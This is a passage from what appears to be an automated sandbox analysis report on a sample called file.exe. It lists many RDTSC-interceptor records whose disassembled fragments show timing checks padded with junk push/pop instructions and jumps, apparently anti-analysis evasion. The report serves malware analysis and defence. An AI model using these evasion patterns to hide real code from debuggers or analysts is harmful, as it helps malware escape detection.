                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD44A4 second address: CD44B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007F6398F5EC96h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0ABE second address: CD0AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0AC7 second address: CD0ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C712DB second address: C712E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C761A4 second address: C761E5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6398F5EC96h 0x00000008 jmp 00007F6398F5ECA9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F6398F5EC9Dh 0x00000014 push ebx 0x00000015 push edi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f jnl 00007F6398F5EC96h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C761E5 second address: C761EF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C761EF second address: C761F9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6398F5EC96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C761F9 second address: C761FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD93FF second address: CD9404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD9404 second address: CD9417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6398F5B49Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD9417 second address: CD9437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6398F5ECA6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD9437 second address: CD9475 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5B4A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnc 00007F6398F5B496h 0x00000010 jmp 00007F6398F5B4A8h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD958A second address: CD958E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD958E second address: CD9594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD9594 second address: CD959E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD959E second address: CD95BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5B4A1h 0x00000007 je 00007F6398F5B496h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD95BD second address: CD95C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD95C1 second address: CD95C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCC1D second address: CDCC2F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCC2F second address: CDCC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCC33 second address: CDCC41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5EC9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCC41 second address: CDCC52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCC52 second address: CDCC56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCC56 second address: CDCC78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5B4A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6398F5B49Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCC78 second address: CDCC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6398F5ECA7h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B2D1 second address: C7B2D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4E61 second address: CE4E79 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6398F5EC96h 0x00000008 jng 00007F6398F5EC96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007F6398F5EC96h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4E79 second address: CE4E9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5B49Ch 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F6398F5B49Fh 0x00000011 pop esi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE3B85 second address: CE3B89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE430A second address: CE430E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE430E second address: CE4312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4312 second address: CE432C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6398F5B4A4h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE432C second address: CE4338 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6398F5EC9Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4752 second address: CE4761 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jns 00007F6398F5B496h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4B4B second address: CE4B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4B4F second address: CE4B53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4B53 second address: CE4B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6398F5EC9Eh 0x0000000c jmp 00007F6398F5ECA7h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4B80 second address: CE4B8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F6398F5B496h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4B8D second address: CE4B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4D04 second address: CE4D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4D08 second address: CE4D18 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F6398F5EC9Ah 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4D18 second address: CE4D1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE8909 second address: CE8915 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBE7D6 second address: CBE7DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBE7DC second address: CBE855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 xchg eax, ebx 0x00000007 mov edx, dword ptr [ebp+122D2A7Bh] 0x0000000d sub di, 0392h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 or dword ptr [ebp+122D30BFh], ebx 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 mov dword ptr [ebp+122D218Dh], edx 0x0000002c mov dword ptr [ebp+124804CDh], esp 0x00000032 mov edx, dword ptr [ebp+122D2BDBh] 0x00000038 cmp dword ptr [ebp+122D2A8Bh], 00000000h 0x0000003f jne 00007F6398F5ED7Ch 0x00000045 call 00007F6398F5EC9Bh 0x0000004a mov edi, 293FB844h 0x0000004f pop edx 0x00000050 mov byte ptr [ebp+122D1F1Fh], 00000047h 0x00000057 and edx, dword ptr [ebp+122D2AB3h] 0x0000005d mov eax, D49AA7D2h 0x00000062 and edx, dword ptr [ebp+122D1C79h] 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push esi 0x0000006c ja 00007F6398F5EC96h 0x00000072 pop esi 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBE855 second address: CBE85B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBE85B second address: CBE85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEC22 second address: CBEC7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F6398F5B496h 0x0000000d jng 00007F6398F5B496h 0x00000013 popad 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a jbe 00007F6398F5B49Ch 0x00000020 js 00007F6398F5B496h 0x00000026 push ebx 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 pop ebx 0x0000002a popad 0x0000002b mov eax, dword ptr [eax] 0x0000002d pushad 0x0000002e jmp 00007F6398F5B4A5h 0x00000033 jnl 00007F6398F5B49Ch 0x00000039 popad 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 je 00007F6398F5B496h 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEC7F second address: CBED25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5ECA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6398F5EC9Ch 0x0000000e popad 0x0000000f pop eax 0x00000010 mov dh, bl 0x00000012 call 00007F6398F5EC99h 0x00000017 jne 00007F6398F5ECA2h 0x0000001d push eax 0x0000001e jl 00007F6398F5ECA2h 0x00000024 jnc 00007F6398F5EC9Ch 0x0000002a mov eax, dword ptr [esp+04h] 0x0000002e push edi 0x0000002f ja 00007F6398F5ECAEh 0x00000035 pop edi 0x00000036 mov eax, dword ptr [eax] 0x00000038 jmp 00007F6398F5ECA8h 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 jnp 00007F6398F5EC96h 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEDFB second address: CBEDFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEDFF second address: CBEE03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEE94 second address: CBEEC9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6398F5B498h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], esi 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F6398F5B498h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 nop 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d pop eax 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEEC9 second address: CBEED7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5EC9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEED7 second address: CBEEDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEEDD second address: CBEEEE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6398F5EC96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBEEEE second address: CBEEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF08F second address: CBF09D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6398F5EC96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF09D second address: CBF0A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF18E second address: CBF194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF194 second address: CBF19B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF5AB second address: CBF5B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF895 second address: CBF8BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6398F5B4A0h 0x00000009 popad 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jo 00007F6398F5B4A0h 0x00000015 pushad 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF8BA second address: CBF8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 jp 00007F6398F5ECAEh 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push esi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF8E7 second address: CBF8ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC22C second address: CEC232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC232 second address: CEC269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F6398F5B4A8h 0x0000000a jmp 00007F6398F5B49Bh 0x0000000f popad 0x00000010 jng 00007F6398F5B4B6h 0x00000016 jo 00007F6398F5B4A2h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC269 second address: CEC27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6398F5EC96h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC55D second address: CEC567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6398F5B496h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC9B2 second address: CEC9CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6398F5ECA2h 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECB1F second address: CECB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECB23 second address: CECB34 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6398F5EC96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECB34 second address: CECB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECB40 second address: CECB46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECB46 second address: CECB4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECB4A second address: CECB50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECB50 second address: CECB56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECB56 second address: CECB78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6398F5ECA8h 0x00000009 jns 00007F6398F5EC96h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECB78 second address: CECB7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF17E0 second address: CF17E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF17E8 second address: CF17EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF1978 second address: CF1991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6398F5ECA5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF1991 second address: CF19A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F6398F5B496h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF19A4 second address: CF19CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F6398F5EC96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F6398F5ECADh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF19CD second address: CF19D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jne 00007F6398F5B496h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF19D9 second address: CF19DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2093 second address: CF2097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2097 second address: CF209D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF209D second address: CF20D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5B4A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F6398F5B4A5h 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F6398F5B496h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF20D3 second address: CF20D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7114 second address: CF711A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF711A second address: CF711F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF740C second address: CF7438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6398F5B496h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6398F5B4A9h 0x00000012 jns 00007F6398F5B496h 0x00000018 rdtsc
